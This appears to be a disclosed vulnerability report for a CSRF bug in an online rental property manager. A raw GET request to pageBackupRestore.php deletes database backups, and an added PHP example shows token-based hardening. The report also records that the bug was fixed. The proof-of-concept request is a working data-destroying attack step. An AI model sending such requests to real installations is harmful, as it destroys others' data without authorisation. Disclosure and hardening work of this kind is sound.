Cross-Site Request Forgery (CSRF) in bigprof-software/online-rental-property-manager

Valid

Reported on

Aug 4th 2021


✍️ Description

A CSRF bug allows a database backup to be deleted.

🕵️‍♂️ Proof of Concept

The request below is vulnerable to CSRF, which allows a database backup to be deleted:

GET /online-rental-property-manager/app/admin/pageBackupRestore.php?action=delete&md5_hash=eea01b37c4b7422a4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/online-rental-property-manager/app/admin/pageBackupRestore.php

Just open this URL and the backup file is deleted. You need to change the backup ID in the URL.

💥 Impact

CSRF bug
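For reference, one way to harden a delete action like the one in the proof of concept, written as an added example and not taken from the project or its fix commit. The function names, the csrf_token form field, the 32-character id format and the backups/ path are assumptions, and the admin login check is assumed to happen before this code runs.

```php
<?php
// Added example, not the project's code. Names below are assumptions.
// SameSite=Lax alone still sends the cookie on a top-level GET navigation,
// so the delete action must also refuse GET and demand a token.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

// One random token per session; the admin page embeds it in its delete form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Stop unless this is a POST carrying the session's token.
function require_csrf_post(): void
{
    if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST') {
        http_response_code(405);
        header('Allow: POST');
        exit('Method not allowed');
    }
    $sent = $_POST['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    if (!is_string($sent) || $expected === '' || !hash_equals($expected, $sent)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
}

if (($_REQUEST['action'] ?? '') === 'delete') {
    require_csrf_post();
    $hash = $_POST['md5_hash'] ?? '';
    // Assumed id format: 32 lowercase hex characters, so it cannot carry a path.
    if (!is_string($hash) || !preg_match('/\A[a-f0-9]{32}\z/', $hash)) {
        http_response_code(400);
        exit('Bad backup id');
    }
    $file = __DIR__ . '/backups/' . $hash . '.sql'; // hypothetical location
    if (is_file($file)) {
        unlink($file);
    }
}
```

The delete form on the admin page would carry the value of csrf_token() in a hidden csrf_token field, so a request triggered from another site has no way to supply it.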

We have contacted a member of the bigprof-software/online-rental-property-manager team and are waiting to hear back 2 years ago
BigProf Software marked this as fixed with commit 1f0242 2 years ago
BigProf Software has been awarded the fix bounty
This vulnerability will not receive a CVE